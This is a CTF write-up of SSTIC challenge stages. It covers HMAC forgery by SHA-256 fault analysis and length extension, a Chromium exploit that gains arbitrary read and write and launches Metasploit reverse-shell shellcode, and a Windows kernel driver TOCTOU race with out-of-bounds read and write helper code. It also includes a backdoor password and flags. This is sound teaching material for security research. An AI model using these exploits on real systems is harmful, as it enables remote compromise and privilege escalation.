$T'_1$ calculated | $T'_1 = g + \Sigma_1(d + T_1) + Ch(d + T_1, e, f) + K_{63} + W_{63}$ | $T'_1 = g + \Sigma_1(d + T_1) + Ch(d + T_1, e, f) + K_{63} + W_{63}$ |
$T'_2$ calculated | ${T'}_2^1 = \Sigma_0(T_1 + T_2^1) + Maj(T_1 + T_2^1, a, b)$ | ${T'}_2^1 = \Sigma_0(T_1 + T_2^2) + Maj(T_1 + T_2^2, a, b)$ |
Output | $(T'_1 + {T'}_2^1, T_1 + T_2^1, a, b, c + \Delta_1 + T'_1, d + T_1, e, f)$ | $(T'_1 + {T'}_2^2, T_1 + T_2^2, a, b, c + \Delta_2 + T'_1, d + T_1, e, f)$ |
Subtracting these two outputs yields $({T'}^1_2 - {T'}^2_2, T^1_2 - T^2_2, 0, 0, \Delta_1 - \Delta_2, 0, 0, 0)$. Since the $T$ values involve a non-linear mixing of various inputs, having these differences allows us to constrain the possible values of the inputs, thereby narrowing down the possible register values entering this round. Furthermore, since the final hash output is the result of adding the last output to the input hash value, and we assume we know the final hash output, this also helps to constrain the possible values of the input hash value. With enough equations, we can in principle invert the SHA-256 hash to obtain the input hash value and input message block from several faulty outputs.
Actually writing down and solving these equations by hand is too much work. Luckily, we can use a SAT solver to do it for us. SAT solvers, like Z3 or Boolector, can solve large systems of boolean equations reasonably efficiently. We can write equations relating the various faulty hash values and their inputs, and have the SAT solver solve for the inputs.
We'll focus on attacking the final $c_3$ block of the HMAC, and aim to solve for the inputs $c_1$ and $c_2$. First, we collect a large number of faulty signatures using collect.py
, all for a single fixed message. Then, we write a set of equations that relate various intermediate values to the (faulty) outputs.
I tried several SAT solvers for this challenge (Z3, CVC5, Boolector), and found that only Boolector seemed to be able to solve the equations in a reasonable amount of time.
The overall process for solving for $c_1$ and $c_2$ is as follows:
- Use a small number of faulty signatures to establish an initial guess on $c_1$ (the input hash value). 8 faults each from rounds 60 and 62 suffices to determine every word in $c_1$ except the first and fifth. The first and fifth words differ from the real $c_1$ by the same constant offset, due to the linear contribution of the unknown $W_{63}$ to $T_1$ in the final round.
- Use our guess on the input hash value $c_1$ to solve for the last 20 words of the message schedule. Note that the last word $W_{63}$ is not uniquely determined because of our constant offset, however, the remaining words can be uniquely determined by using faulty signatures from the 40th round onwards.
- Solve for the initial message $c_2$ given 16 consecutive words of the message schedule.
- Use the message schedule to solve for the initial hash value $c_1$; this is essentially just solving for the constant offset, now that $W_{63}$ is known.
The entire process is implemented in solve1.py
, and takes around 2 minutes to run on a laptop computer. It produces the following information for the message from:@mafiaTEST\\to:@mafiaBOSS\\content:foobar
:
- $c_1 = $
ba8c272fa6c72abc42778cb2f9b89e9456acbf45f1cd3a47d573028c6a216a21
- $c_2 = $
3a1dabd8d8ed5c9dfec87ea7cadfdfe669a41d55063301efa0e8abe78620f0f9
Having $c_1 = F(IHV, k \oplus opad)$ and $c_2 = F(c_0, m \parallel padding) = H((k \oplus ipad) \parallel m)$ is very powerful, because we can use this information to forge HMAC tags via length extension.
In a length extension attack, we can compute $H(m \parallel padding \parallel m')$ for a suffix $m'$ given $H(m)$ by simply computing $F(H(m), m' \parallel padding')$. This works due to the Merkle-Damgård construction of SHA-256 (and related hashes like MD5 and SHA-1).
In the HMAC setting, since we have $c_2 = H((k \oplus ipad) \parallel m)$, we can compute $c_2' = H((k \oplus ipad) \parallel m \parallel padding \parallel m')$ via length extension, then compute $c_3' = F(c_1, c_2' \parallel padding)$. This effectively gives us a valid HMAC on the message $m \parallel padding \parallel m'$.
The padding consists of a lot of non-textual characters, such as 0x80 and 0x00. Luckily, the Python mafiachat server uses a custom message parser and .decode("utf-8", "ignore")
to decode the binary data into a string message. The parser looks for \
-separated key-value fields, and allows later fields to overwrite earlier fields. Therefore, we can use our length extension to append an m'
which overwrites all of the message fields, thereby allowing us to forge any message we want.
The length extension attack is implemented in solve2.py
. When run, it generates a forged message from @mafiaDEV
to @mafiaBOSS
and posts it to the mafiachat server. The forged message looks like this: from:@mafiaTEST\\to:@mafiaBOSS\\content:foobar\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03`\\from:@mafiaDEV\\to:@mafiaBOSS\\content:d2Fzc3VwIGJybz8h
The result is a quick reply from @mafiaBOSS
:
{
"result": {
"msgs": [{
"content": "Oh bro the chat is up that's so sick bro",
"from": "@mafiaBRO",
"to": "@mafiaDEV"
}, [...], {
"content": "Hey, Hey! Mafia-Dev!",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "It seems our new chat is working, what a glorious day for the Green Shard!",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "Please send me an authenticated message ASAP.",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "I will then reveal you your next mission.",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "Ave Viridis Crystallum",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "wassup bro?!",
"from": "@mafiaDEV",
"to": "@mafiaBOSS"
}, {
"content": "Well done DEV, I see your MafiaChat is working well!",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "Since this communication channel is clearly trustworthy, here is a secret address where you can learn more about your next mission for the organisation.",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "http://163.172.99.233:8080/1616c662849ee18fa8ad0f370fd6e5ac",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}, {
"content": "Ave Viridis Crystallum",
"from": "@mafiaBOSS",
"to": "@mafiaDEV"
}]
},
"version": 2
}
Our next destination is http://163.172.99.233:8080/1616c662849ee18fa8ad0f370fd6e5ac, which gives us a flag for stage 3: SSTIC{b3e2c71f3e67d5a8d5855adb30842549ad2bc6e3e7bdbec141d61ee83e2f8f46}
. On to Chapter 4: Hic Jacet Chromium!
In this challenge, we're given a patched copy of the Chromium browser, which the Boss uses on his machine. We can send him an HTML page to load, and our goal is to pop a reverse shell on his machine by exploiting this custom build of Chromium.
To make this challenge (much) easier, Chromium is running with the --no-sandbox
flag. This disables sandboxing on the renderer processes (the processes that handle individual websites), meaning that if we can gain code execution on the renderer, we can just directly spawn a shell.
We're provided with the source code for a new authenticator
module which is compiled into the provided Chromium build, as well as full symbols (4GB+!) for chrome.dll
. From the IDL files (authenticator.idl
and authentication_data.idl
), we can see that the extension module exposes two new classes to JavaScript called AuthenticationData
and Authenticator
. Indeed, based on their constructor
signatures, we can create instances of these classes with JavaScript code like this:
let ad_buf = new ArrayBuffer(32);
let ad = new AuthenticationData(ad_buf, 0n, 0, 0n);
let auth_buf = new ArrayBuffer(32);
let auth_view = new DataView(auth_buf);
let auth = new Authenticator(auth_view);
We're told that the developer of this module "is the worst developer ever born", and this code does not disappoint. The function AuthenticationData::patch_value
provides an arbitrary read/write with a selectable size (1, 2, 4 or 8 bytes):
case METHOD4: //QWORD
saved_value_ = *(unsigned long long*)(&(authenticode_[end_of_authenticode_]));
*(unsigned long long*)(&(authenticode_[end_of_authenticode_])) = delimiter_;
break;
end_of_authenticode_
and delimiter_
are 64-bit values which can be conveniently set with the JavaScript-exposed setEndOfAuthenticode
and setDelimiter
methods, respectively; no bounds checking is performed. Both functions take BigInt
s, which allows us to set these two fields to any 64-bit quantity from JavaScript. authenticode_
is a 32-byte inline array in the AuthenticationData
class, so we get read/write relative to the AuthenticationData
structure.
The only wrinkle is that this wonderful function isn't directly reachable from JavaScript. Instead, it is only called from Authenticator::Authenticate(AuthenticationData)
, which is reachable from JavaScript. That function sets a member variable authenticated_data_
to point to the passed-in class, then calls authentication_data_->patch_value()
, then some functions that are always effectively no-ops, and finally authentication_data_->restaure_value()
which restores the saved value, thus undoing the write:
case METHOD4: //QWORD
*(unsigned long long*)(&authenticode_[end_of_authenticode_]) = saved_value_;
break;
Since the JS-reachable function Authenticator::get_authentication_data_info
returns the saved_value
of the attached AuthenticationData
, we have arbitrary read of any writable memory. We can use this to read the vtable pointer of AuthenticationData
, which leaks the ASLR base of chrome.dll
:
let disable_log = false;
function log() {
if(disable_log)
return;
console.log.apply(console.log, arguments);
let msg = "";
for(let obj of arguments) {
msg += obj + " ";
}
document.getElementById("log").innerText += msg + "\n";
}
function fatal() {
console.error.apply(console.error, arguments);
let msg = "FATAL: ";
for(let obj of arguments) {
msg += obj + " ";
}
document.getElementById("log").innerText += msg + "\n";
throw new Error(msg);
}
log("Beginning exploit");
let ad_buf = new ArrayBuffer(32);
let buf = new ArrayBuffer(65536);
let view = new DataView(buf);
view.setBigUint64(0, 0xdeadbeeff00dn, true);
let qword_data = new AuthenticationData(ad_buf, 0n, 3, 0n);
let ad2 = new AuthenticationData(ad_buf, 0n, 3, 0n);
let auth0 = new Authenticator(view);
auth0.Authenticate(qword_data);
let auth = new Authenticator(view);
auth.Authenticate(qword_data);
log("Initial info:", auth.get_authentication_data_info());
function _read8_rel(offset) {
qword_data.setEndOfAuthenticode(offset & 0xffffffffffffffffn);
auth.Authenticate(qword_data);
let res = auth.get_authentication_data_info();
return BigInt(res.match(/saved_value = (.+)/)[1]);
}
function read8_rel(offset) {
if (typeof offset === "number") {
offset = BigInt(offset);
}
let res = _read8_rel(offset);
log(`read8_rel @0x${offset.toString(16)} => 0x${res.toString(16)}`);
return res;
}
let chrome_base = read8_rel(-48) - 0xbb525d0n;
if ((chrome_base & 0xffffn) != 0n) {
fatal("unaligned pointer " + chrome_base.toString(16));
}
log(`chrome.dll base: 0x${chrome_base.toString(16)}`);
The objects we allocate tend to be near each other in the heap. Thus, after allocating a few Authenticator
s and/or AuthenticationData
objects, we can search for the distinctive vtable addresses to locate them relative to a particular AuthenticationData
:
let ad2_offset = 0;
for(var i=32; i<1024; i+=8) {
if(read8_rel(i) == chrome_base + 0xbb525d0n) {
ad2_offset = i;
break;
}
}
if(ad2_offset != 0) {
log("AuthenticationData ad2 found at offset", i);
} else {
fatal("Failed to find AuthenticationData");
}
let auth0_offset = 0;
for(var i=32; i<1024; i+=8) {
if(read8_rel(i) == chrome_base + 0xbb52790n) {
auth0_offset = i;
break;
}
}
if(auth0_offset != 0) {
log("Authenticator auth0 found at offset", i);
} else {
fatal("Failed to find Authenticator");
}
These objects are allocated on the cppgc "caged heap", which is a ~4GB region of memory, aligned to a 4GB address boundary. Most of the internal pointers that point into the heap are stored as compressed pointers: 32-bit pointer values that are combined with the cage base to produce the full pointer value. Thus, when we leak e.g. the address of an AuthenticationData
via an associated Authenticator
, we only get the low 32 bits of the actual address.
However, by chance, the cppgc heap still contains a number of uncompressed pointers into the heap. By simply iterating over the memory near AuthenticationData
, we can usually find such an uncompressed pointer within a few KB, and thus obtain the cage base. In combination with an AuthenticationData
address, this gives us 8-byte absolute read from any writable address:
function read_compressed_ptr(offset) {
let res = read8_rel(offset);
return (res << 1n) & 0xffffffffn;
}
// The auth we find must not be `auth`, or this will crash!
let auth_data_cptr = read_compressed_ptr(auth0_offset + 0x10);
log("Compressed auth data pointer:", auth_data_cptr.toString(16));
// Heuristic: assume a cage pointer looks like 0x0000xxxx000xxxxx
let cage_base = 0;
for(var i=256; ; i+=8) {
let c = read8_rel(i);
let clo = c & 0xffffffffn;
let chi = c >> 32n;
if(auth_data_cptr - 0x100000n <= clo && clo < auth_data_cptr + 0x100000n && chi > 1 && chi < 0xffff) {
cage_base = chi << 32n;
break;
}
}
if(cage_base != 0) {
log("found probable cage pointer:", cage_base.toString(16));
} else {
fatal("Failed to find cage base");
}
function read8_abs(addr) {
let res = _read8_rel(addr - (cage_base + auth_data_cptr + 0x30n));
log(`read8_abs @0x${addr.toString(16)} => 0x${res.toString(16)}`);
return res;
}
Our goal is now to obtain arbitrary write too.
My first thought was to exploit a race condition, since both of these classes are accessible to Window
, Worker
and SharedStorageWorklet
. Web workers enable true multithreading on JavaScript, which makes such a race condition viable: we simply have to change the end_of_authenticode_
value in the middle of another thread's Authenticator::Authenticate
operation, and hope that we land the change between patch
and restore
.
While this probably works in theory, it sounds slow and painful to debug. So, I came up with a different approach: we can use authentication_data_->patch_value()
to change the authentication_data_
pointer itself, thereby causing authentication_data_->restaure_value()
to "restore" from a completely different AuthenticationData
instance. All we need for this to work is two AuthenticationData
instances, an Authenticator
instance, and their addresses. We'll also employ a DataView
as a scratch buffer to set saved_value_
to the value we want to write.
The full arbitrary write implementation looks like this:
// read Authenticator::key_
let key_cptr = read_compressed_ptr(auth0_offset + 0x48);
log("Compressed key pointer:", key_cptr.toString(16));
// obtain base of `buf`
let dataview_base = read8_abs(cage_base + key_cptr + 0x10n);
log("Key base address:", dataview_base.toString(16));
let dataview_data = read8_abs(dataview_base);
log("Dataview data:", dataview_data.toString(16));
function write8_abs(addr, value) {
log(`write8_abs @0x${addr.toString(16)} => 0x${value.toString(16)}...`);
// arrangement: auth0 will auth ad2, which will set auth0.authenticated_data_ to
// point at qword_data; the "restore" in qword_data will set the target value.
// set qword_data.saved_data_
view.setBigUint64(0, value, true);
read8_abs(dataview_base);
let qd_off = addr - (cage_base + auth_data_cptr + 0x30n);
qword_data.setEndOfAuthenticode(qd_off & 0xffffffffffffffffn);
let ad2_off = (auth0_offset + 0x10) - (ad2_offset + 0x30);
ad2.setEndOfAuthenticode(BigInt(ad2_off) & 0xffffffffffffffffn);
ad2.setDelimiter(0x80000000n | (auth_data_cptr >> 1n));
auth0.Authenticate(ad2);
}
// check that absolute writes work
write8_abs(dataview_base + 8n, 0xfeedfacen);
let write_check = read8_abs(dataview_base + 8n);
if(write_check != 0xfeedfacen) {
fatal("write8 failed, got:", write_check.toString(16));
}
At this point, we have the ability to cleanly read and write any writable memory, and we have the ASLR base of chrome.dll
and the cppgc caged base. It sounds like it would be really easy to win!
Unfortunately, chrome.dll
uses Control Flow Guard (CFG) so we can't just overwrite vtables willy-nilly. Although there is a ton of writable memory in chrome.dll
, it's difficult to figure out what's actually useful for exploitation purposes. We also don't have any ASLR leak for things like the PEB/TEB or stacks.
Faced with this, I chose to just use bruteforce instead. I dumped every writable memory region that we knew the address of:
modules = {}
# parse WinDbg lm output
for row in open("modules.txt"):
if not row.strip(): continue
start, end, name, *_ = row.replace("`", "").split()
start = int(start, 16)
end = int(end, 16)
modules[name] = (start, end)
# parse WinDbg !address output (filtered for writable sections)
for row in open("regions.txt"):
if not row.strip(): continue
start, end, *_ = row[2:].replace("`", "").split()
start = int(start, 16)
end = int(end, 16)
# dump cppgc heap and chrome.dll regions
if (start >> 32) == 0x5523 or modules["chrome"][0] <= start < modules["chrome"][1]:
print(".memdump memdump\\%x.bin %x %x" % (start, start, end - 1))
Then, I wrote a short script to look for stack addresses (based on the stack addresses I saw in WinDbg: 0x5cXXXXXXXX):
import os, struct
for fn in os.listdir("memdump"):
if not fn.endswith(".bin"):
continue
f = open(fn, "rb").read()
base = int(fn.split(".")[0], 16)
for i in range(0, len(f), 8):
val, = struct.unpack("<Q", f[i:i+8])
if (val >> 32) == 0x5c:
print(hex(base+i), hex(val))
There were a lot of hits, mostly in what looked like static allocation arenas. However, two hits stood out:
chrome!WTF::internal::g_main_thread_stack_start
chrome!content::g_client
These two variables conveniently hold addresses to the stack. The main thread is also the thread on which the JavaScript interpreter runs, so we can walk the stack pointed to by g_main_thread_stack_start
looking for the JavaScript interpreter frames.
To do this, I defined a dummy JS function with a large number of local variables, which get pushed to the stack, then had it call a function that would walk the stack looking for those variables. The callee then writes a ROP chain to the stack, then returns to trigger the ROP.
As for the ROP chain itself, I made use of a very convenient Chromium function called base::win::internal::ModifyCode
. This function takes destination, source, length
as arguments, uses VirtualProtect
to make the destination writable, memcpy
s the source into the destination, then uses VirtualProtect
to make it read-only again. It is literally perfect for adding shellcode! We write an off-the-shelf Metasploit shell_reverse_tcp
shellcode to the buf
ArrayBuffer (which we already have the address for), use ROP to call ModifyCode
to copy the shellcode to executable memory, and then jump to it at the end of our ROP chain.
The full exploit can be found in exploit.html
. The provided submission server doesn't come with any documentation on how to submit an HTML file, but blindly trying junk inputs causes the server to just reply with a submission script:
$ curl 163.172.99.233:30285 --data x
An error occured while parsing your input.
I asked you to send me the raw webpage, what the hell are you doing ?!
Just use a post request containing the raw data of your html page.
Bonarium sent me things using this script if you need it:
import requests
url = 'SECRETURL'
data = {'code': 'HIDDEN'}
requests.post(url, json = data)
Using this, we can submit our exploit, and after a few moments, we get a reverse shell after a few moments which allows us to access the Boss's machine!
We're dumped into a cmd.exe
session that is broken somehow (many actions come up Access is denied.
), so the first thing we do is just to run powershell.exe
and cd $env:USERPROFILE
to go to the home directory. There, we find three files: backdoor.py
, flag_step4.txt
, and server.py
.
flag_step4.txt
:
Well done!
Get your flag at: http://163.172.99.233:8080/ad51f6d07dd762921092554df7af530a
At this URL, we find a flag, SSTIC{eb92ddb9cbc5fd3114f117a30796fd17340fa6cda03e08f158c6e7572252d31a}
, and begin Chapter 5: Whispers in the Shadows!
One more push! The user we've logged into, EMERALD
, is only a normal user; we have to escalate our privileges to read files in C:\Users\Administrator
. The system ships with a custom Windows kernel driver called netshdw
; we're given the driver binary and a VM disk image to run the entire Windows setup locally. Our goal is to exploit this kernel driver to perform a local privilege escalation. The server is running a copy of backdoor.py
, which allows us to log in to the server as EMERALD using a specific backdoor password (FYTn5OybJ097HUOr0oQSIja6pN4aagTj
).
I've never done any real Windows kernel pwn before, so this promised to be quite a ride. Luckily, I do have some prior experience with Windows kernel stuff from the KVSRV challenge at Hexacon 2023, although that was for a very different type of driver.
I reversed the driver using Ghidra. It is an NDIS Protocol Driver, which intercepts network packets and implements logic for a certain network protocol. In this case, the protocol is the custom "Net Shadow" communication protocol, which provides "multi-layer encryption and address masking", per the challenge description.
I spent a fair bit of time carefully reversing the entire driver; the result can be found in netshdw.c
. Generally speaking, trailing underscores on a Shdw*
function name indicates that the name is a guess; no trailing underscore means that the name is known from e.g. a log message or function pointer name.
The driver implements a protocol handler for Ethernet packets having an Ethertype of 0xdead (ShdwReceiveNetBufferLists_
). Messages are sent between ports, which are identified with 64-bit port IDs. The driver exposes an IOCTL interface (ShdwCtrlDeviceIoCtl
) to allow local programs to add/remove local ports and to send/receive packets on those local ports.
Since we don't have the ability to create our own Ethernet packets on this network, the other "remote" ports will simply be other local ports on the same machine.
There are two types of network packets (ShdwPtDispatchPacket
): sync packets and message packets. Sync packets inform other peers about the creation or destruction of local ports, causing them to update their list of remote ports. Sync packets for new ports also include an RSA public key, which is used to encrypt content messages. Message packets can either be directly addressed to the recipient, or include instructions to forward the message to another port. This is used to provide a TOR-like experience, where a client selects multiple ports and creates a series of nested forwarding instructions, bouncing the message between several ports before arriving at its final destination (ShdwSndSend
).
A port can be created with a bitwise-OR of flags 1, 2, and 4, which permit forwarding, receiving, and sending, respectively (ShdwCtrlOpenLocalPort
). However, receive and send (flags 2 and 4) are mutually exclusive, as they use the same block structures (BlockFlink/BlockBlink) to hold either received data or enqueued ("delayed") data to send, respectively.
When a non-forwarded message is received on a local port (ShdwRcvNetworkHandler
), the packet content is copied to a 4KB buffer in the local port structure, and the block describing the data block (sender port, size, and buffer offset) is added to the local port's block linked list. The packet can then be read using a specific IOCTL.
When packets are sent from a particular local port using an IOCTL, the caller supplies a flag to control how the data is set. Flag 2 stores the message in the local port without sending it. Flag 4 stores the message, then sends stored messages matching a certain condition. If neither 2 nor 4 are set, the message is sent immediately, bypassing the stored messages. When storing a message, ShdwStoreSend
tries to find a block that is going to the same destination and appends to that block if possible; otherwise, it allocates a new block structure which stores the port, size and message buffer in-line using a variably-sized allocation (skipping the 4KB buffer in the local port).
It is immediately suspicious that senders and receivers share a single linked list of messge blocks, but use them slightly differently. Receivers treat each block as pointing into a pre-allocated 4KB buffer, whereas senders treat each block as having the block data directly appended to the block structure. All that prevents a nasty type confusion vulnerability here is the fact that a port cannot be created with both flags 2 and 4 (receive and send) simultaneously.
The control codes for each IOCTL are as follows:
- OpenLocalPort: 0x12a001 =
CTL_CODE(FILE_DEVICE_NETWORK, 0x800, METHOD_IN_DIRECT, FILE_WRITE_ACCESS)
- CloseLocalPort: 0x12a005 =
CTL_CODE(FILE_DEVICE_NETWORK, 0x801, METHOD_IN_DIRECT, FILE_WRITE_ACCESS)
- Send: 0x12a009 =
CTL_CODE(FILE_DEVICE_NETWORK, 0x802, METHOD_IN_DIRECT, FILE_WRITE_ACCESS)
- Recv: 0x12600e =
CTL_CODE(FILE_DEVICE_NETWORK, 0x803, METHOD_OUT_DIRECT, FILE_READ_ACCESS)
The control code's METHOD
specifies how the data is to be passed to the driver. METHOD_BUFFERED
would allocate a buffer in the kernel that would hold inputs/outputs, whereas METHOD_*_DIRECT
allows the driver to directly access the memory region passed in by the user.
In all cases, this driver uses direct mode. This means that whenever the driver accesses data in an input buffer, it is accessing data directly from the user program's memory (as opposed to buffered mode, where the data would come from a kernel copy of the input data).
The handler for OpenLocalPort
looks like this:
if (code == 0x12a001) {
// Check that the input is the right length
if ((lVar1->OutputBufferLength != 0xc) || (pvVar4 = Irp->MdlAddress, pvVar4 == (MDL *)0x0))
goto LAB_1400017c9;
// plVar8 = MmGetSystemAddressForMdlSafe(pvVar4, MdlMappingNoWrite | MdlMappingNoExecute | NormalPagePriority)
if ((*(byte *)&pvVar4->MdlFlags & 5) == 0) {
plVar8 = (longlong *)MmMapLockedPagesSpecifyCache(pvVar4,0,1,0,0,0xc0000010);
} else {
plVar8 = (longlong *)pvVar4->MappedSystemVa;
}
if (plVar8 != (longlong *)0x0) {
uVar4 = ShdwCtrlOpenLocalPort(DeviceObject,plVar8);
goto LAB_1400018e5;
}
}
Hence, the second argument of ShdwCtrlOpenLocalPort
points directly at user memory. It is used as follows:
uint ShdwCtrlOpenLocalPort(DEVICE_OBJECT *param_1,longlong *param_2)
{
/* ... */
// reject if flag bits 2 and 4 are both set
if (((byte)*(undefined4 *)(param_2 + 1) & 6) == 6) {
return 0xc000000d;
}
/* ... */
uVar4 = *(uint *)(param_2 + 1);
lport_->flags = uVar4;
if ((uVar4 & 2) == 0) {
if ((uVar4 & 4) != 0) {
...
}
} else {
/* ... */
}
/* ... */
}
Note that the flags are loaded from the supplied input buffer twice. Therefore, we have a time-of-check-to-time-of-use (TOCTOU) race condition vulnerability. If another user thread manages to change the buffer contents from 4 to 6 after the initial check, but before the flags are used, we can make a local port with flags 2 and 4 both set!
The challenge authors have been kind enough to ship a copy of Python in the Windows image, so we can develop our exploit in Python, allowing us to experiment with it interactively.
I used ctypes
to wrap relevant functions from Windows API (my_winapi.py
), providing a nice Pythonic way to call into the Windows API. With this, we can interact with the netshdw driver:
from my_winapi import *
from struct import pack, unpack_from
import ctypes
import threading
import time
import sys
import os
driver = CreateFile(r"\\.\netshdw")
def OpenLocalPort(portnr: int, flags: int):
"""
flags 0~5 are allowed; 6 and 7 are banned
if flag 2 is set, Recv is enabled
if flag 4 is set, Send is enabled
if flag 2 is not set, flag 4 can be set to enable receiving data without permitting Recv
(this is used to relay messages?)
if flag 1 or 2 is set, a sync message will be sent and a remote port will be created
"""
DeviceIoControl(driver, 0x12a001, out=pack("<QI", portnr, flags))
def CloseLocalPort(portnr: int):
"""
if flag 1 or 2 is set, a sync message will be sent to deregister this peer
if flag 2 is set, every Recv IRP will be cancelled (0xc0000120) and receive blocks will be freed and removed
if flag 2 is not set, but flag 4 is set, receive blocks will be freed and removed
"""
DeviceIoControl(driver, 0x12a005, out=pack("<Q", portnr))
def Send(payload: bytes):
"""
payload should be formatted as [srcport:8] [dstport:8] [flags:4] [size-0x18:2] [payload:3+]
srcport needs flag 0x4 set
final two bytes are just ignored
if flag 2 is set (e.g. == 2), we will append the message onto the send queue of srcport (note that this is the same object as the recv queue)
else if flag 2 is unset:
if flag 4 is set (e.g. == 4), append the message onto the send queue of srcport, and then send out any delayed messages to that destination
if flag 4 is unset (e.g. == 0), directly send the message, bypassing the send queue
"""
DeviceIoControl(driver, 0x12a009, out=payload)
def Recv(portnr: int, flags: int, size: int):
"""
9 <= size < 0x1009
port needs flag 0x2 set
"""
outbytes = bytearray(size)
return DeviceIoControl(driver, 0x12600e, inbuf=pack("<QI", portnr, flags), out=outbytes)
What we're going to do is attempt to create a port of type 7, by submitting a OpenLocalPort
request while a second thread repeatedly toggles the flags between 5 and 7. If we get a port, we can check if it has flag 2 set by attempting to call Recv
on it; if that hangs, we have the port want we want. We can then cancel the Recv I/O operation from another thread after a time-out.
In code:
def CancelDriverIO():
CancelIoEx(driver)
# see exploit.py for definition of SimpleTimers
timers = SimpleTimers()
def TimeoutRecv(portnr: int, flags: int, size: int, timeout: float):
tid = timers.add_timer(time.time() + timeout, CancelDriverIO)
try:
return Recv(portnr, flags, size)
finally:
timers.remove_timer(tid)
def make_send_buf(srcport, dstport, flags, data):
return pack("<QQIH", srcport, dstport, flags, len(data)) + data + b"xx"
def create_hacked_port(port, flags):
if (flags & 2) == 0:
# no point in doing fancy hack stuff...
return OpenLocalPort(port, flags)
print(f"creating hacked port {port:#x} with flags {flags}")
buf = ctypes.create_string_buffer(pack("<QI", port, flags), 0xc)
do_hammer = True
def hammer_thread():
# this is a bit of a hard race to win in Python, but it is doable
# (due to the GIL, this thread needs to wait until the DeviceIoControl
# call has started to even resume execution)
nonlocal do_hammer, flags
oflags = flags & ~2
while do_hammer:
buf[8] = oflags
buf[8] = flags
threading.Thread(target=hammer_thread, daemon=True).start()
while 1:
try:
DeviceIoControl(driver, 0x12a001, out=buf)
TimeoutRecv(port, 0, 9, 2)
except Exception as e:
print(e.winerror, end=" ")
sys.stdout.flush()
if e.winerror == 0x3e3:
# ERROR_OPERATION_ABORTED - timeout
break
elif e.winerror == 87:
# ERROR_INVALID_PARAMETER - port doesn't support Recv
continue
try:
CloseLocalPort(port)
except Exception as e:
pass
print()
print("got flags=7!")
do_hammer = False
create_hacked_port(0xdeadbeef7, 7)
This takes a little while on my QEMU VM, but it does eventually produce a port with flags=7, as expected. Now, we can turn our attention to exploiting the confusion between Send and Recv.
A single data block (decrypted message) looks like this:
struct ShdwBlock {
struct ShdwBlock * Flink;
struct ShdwBlock * Blink;
ulonglong port;
uint size;
union {
uint buf_offset; // recv only
byte data[]; // send only
};
};
For received packets, port
specifies the sender, size
the size of the message, and buf_offset
the offset of the message within ShdwLocalPort
's 4KB buffer (ShdwLocalPort::buffer
). For delayed-send messages, port
specifies the recipient, size
the size of the message, and then the message contents are appended immediately after size
(overlapping the buf_offset
member).
Both ShdwRcvNetworkHandler
and ShdwStoreSend_
will first search for an existing block matching the sender/receiver port, and if such a block is found, they will append to that block rather than creating a new one.
Thus, if a port supports both Recv and Send, any delayed-send messages will be available to be "received" by Recv; however, the first four bytes of the sent message will be interpreted as a 32-bit buf_offset
into ShdwLocalPort::buffer
, and the message bytes will be read from there. No bounds checking is done in ShdwRcvIRPHandler
to ensure that buf_offset
actually lies within the bounds of the buffer, giving us a highly controllable out-of-bounds read.
Better yet, ShdwRcvNetworkHandler
also doesn't perform any bounds checking while appending to an existing buffer; it only checks that the total length of all blocks doesn't exceed 4KB. This gives us an easy out-of-bounds write which can be triggered by sending a real message to a Send+Recv port that has a delayed-send message queued.
This is how the OOB read and write look in code:
# create a sending port
OpenLocalPort(0xdeadbeef4, 4)
def read_rel(port, offset, length):
""" Read length bytes at an offset of `offset` from the start of the port structure.
port must have flag bits 2 and 4 set. """
assert 1 <= length <= 0xffc
offset -= 0x5c # offset to start of buffer
assert 0 <= offset < (1<<32)
# Create delayed-send message for fake destination
Send(make_send_buf(port, 0xb0ba0, 2, pack("<I", offset) + b"\xaa" * length))
# Send a real message to the hacked port to make the received length nonzero
Send(make_send_buf(0xdeadbeef4, port, 0, b"a"))
result = Recv(port, 0, length + 8 + 4)
# Clear receive queue - this is a separate message
Recv(port, 0, 9)
return result[8:-4]
def write_rel(port, offset, data):
""" Write data bytes at an offset of `offset` from the start of the port structure.
port must have flag bits 2 and 4 set. """
assert 1 <= len(data) <= 0xffb
offset -= 0x5c + 5 # offset to start of buffer, +5 to account for length of first chunk
assert 0 <= offset < (1<<32)
# Create delayed-send message to "append" to
Send(make_send_buf(port, 0xdeadbeef4, 2, pack("<I", offset) + b"a"))
# Send a "second" message from the same port, which will be appended to the existing queued message and written OOB
Send(make_send_buf(0xdeadbeef4, port, 0, data))
# Clear receive queue
Recv(port, 0, len(data) + 8 + 5)
Immediately after the buffer
in ShdwLocalPort
, there is a structure I called ShdwLocalPortCsq
which is meant to support the cancellation of I/O operations (the "Cancellation Shielded Queue"). This structure has a linked list of IRPs as well as function pointers to various Csq-related operations. Right off the bat, we can leak these to obtain the base address of the netshdw driver, as well as the address of the local port in the heap from the empty linked list:
port = 0xdeadbeef7
create_hacked_port(port, 7)
# Read IO_CSQ structure
leak = read_rel(port, 0x1060, 0x60)
driver_base = unpack_from("<Q", leak, 0x8)[0] - 0x20c0
print("got driver base", hex(driver_base))
# No active IRPs, so the linked list pointers will point back to the object
port_addr = unpack_from("<Q", leak, 0x50)[0] - 0x10b0
print(f"got port {i} at", hex(port_addr))
One option now to win is to allocate executable paged-pool memory with shellcode and overwrite the Csq function pointers to point at the shellcode. I did not find this solution during the contest as I incorrectly assumed that most allocations would be non-executable.
Instead, I chose to directly achieve privilege escalation by overwriting the Token field of a process we control with a high-privilege token, such as one from the System process. To do this, I needed to leak a valid token value, get a process structure allocated within the 4GB OOB window after the hacked port structure, and leak the address of this process.
Luckily, Windows comes with a very handy, undocumented API to leak the address of practically any kernel object, in the form of the NtQuerySystemInformation - SystemHandleInformation
call. This call returns a list of every HANDLE allocated on the system, including the owning PID, the handle type, the handle value within the PID, and critically the Object pointer to the underlying kernel object. This call is available to any process of medium integrity or above, and does not require any special privileges otherwise. I am honestly a bit confused about why this call even exists, as it rather directly defeats any and all kernel ASLR (and better yet, gives the precise address of sensitive kernel structures).
